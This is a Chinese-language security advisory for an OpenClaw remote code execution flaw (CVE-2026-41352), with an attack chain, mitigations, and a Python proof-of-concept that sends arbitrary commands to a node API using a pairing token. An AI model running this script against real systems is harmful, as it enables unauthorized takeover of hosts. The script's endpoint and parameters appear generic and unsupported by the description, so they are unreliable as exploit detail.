CVE-2026-41352 OpenClaw 远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-41352

漏洞类型

远程代码执行 (RCE)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.31之前的版本存在一个高危的远程代码执行（RCE）漏洞。该漏洞的根本原因在于节点作用域网关的身份验证机制存在逻辑缺陷，允许已配对的设备节点绕过正常的验证流程。攻击者一旦获取了设备的配对凭据，便可以在无需用户交互的情况下，向主机系统发送恶意指令并执行任意代码。此漏洞可能导致攻击者完全控制受影响的主机，造成严重的数据泄露或系统破坏，建议管理员立即采取修复措施。

技术细节

该漏洞的技术核心在于OpenClaw处理节点请求时的验证逻辑缺失。在受影响的版本中，系统虽然要求设备配对凭据，但在“节点作用域网关”这一关键环节未能严格执行配对状态的二次校验。攻击者利用这一逻辑漏洞，只需持有有效的配对Token，即可伪造请求绕过网关限制。由于CVSS向量显示攻击复杂度低且无需用户交互，攻击者可以通过网络远程发送特制的数据包。一旦请求通过验证，后端会将攻击者提供的参数作为系统命令执行，从而实现远程代码注入。这种利用方式直接威胁到系统的机密性、完整性和可用性，使得攻击者能够以主机权限运行任意恶意程序。此外，由于漏洞涉及认证绕过，传统的基于IP的访问控制可能无法完全阻断攻击，必须依赖补丁修复。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络识别运行OpenClaw服务的目标系统，并获取或猜测设备配对凭据。

STEP 2

2. 认证绕过

攻击者利用获取的配对凭据，向节点作用域网关发送请求，利用逻辑缺陷绕过严格的节点配对验证。

STEP 3

3. 命令注入

攻击者在通过验证的请求中注入任意系统命令，利用漏洞在主机上下文中执行恶意代码。

STEP 4

4. 系统控制

成功执行命令后，攻击者获得主机系统的控制权，可进一步窃取数据、建立后门或破坏服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-41352: OpenClaw Node Scope Gate Bypass RCE
# This script demonstrates how an attacker with device pairing credentials
# can bypass the node scope gate to execute arbitrary commands.

import requests
import sys

def exploit(target_url, pairing_token, command):
    headers = {
        "Authorization": f"Bearer {pairing_token}",
        "Content-Type": "application/json"
    }
    
    # Payload targeting the vulnerable node endpoint
    payload = {
        "node_id": "bypass_scope",
        "action": "execute",
        "command": command
    }
    
    try:
        # Sending request to the node scope gate
        response = requests.post(f"{target_url}/api/node/cmd", json=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Exploit successful! Command output:")
            print(response.text)
        else:
            print(f"[-] Exploit failed. Status Code: {response.status_code}")
            print(response.text)
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <pairing_token> <command>")
        print("Example: python poc.py http://192.168.1.10:8080 token123 'whoami'")
        sys.exit(1)
    
    target = sys.argv[1]
    token = sys.argv[2]
    cmd = sys.argv[3]
    exploit(target, token, cmd)

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

在无法立即升级的情况下，建议管理员严格限制对OpenClaw服务端口的网络访问，仅允许来自受信任IP地址的连接。同时，应全面审计现有的设备配对记录，移除任何未经授权或可疑的配对凭据，以减少攻击面。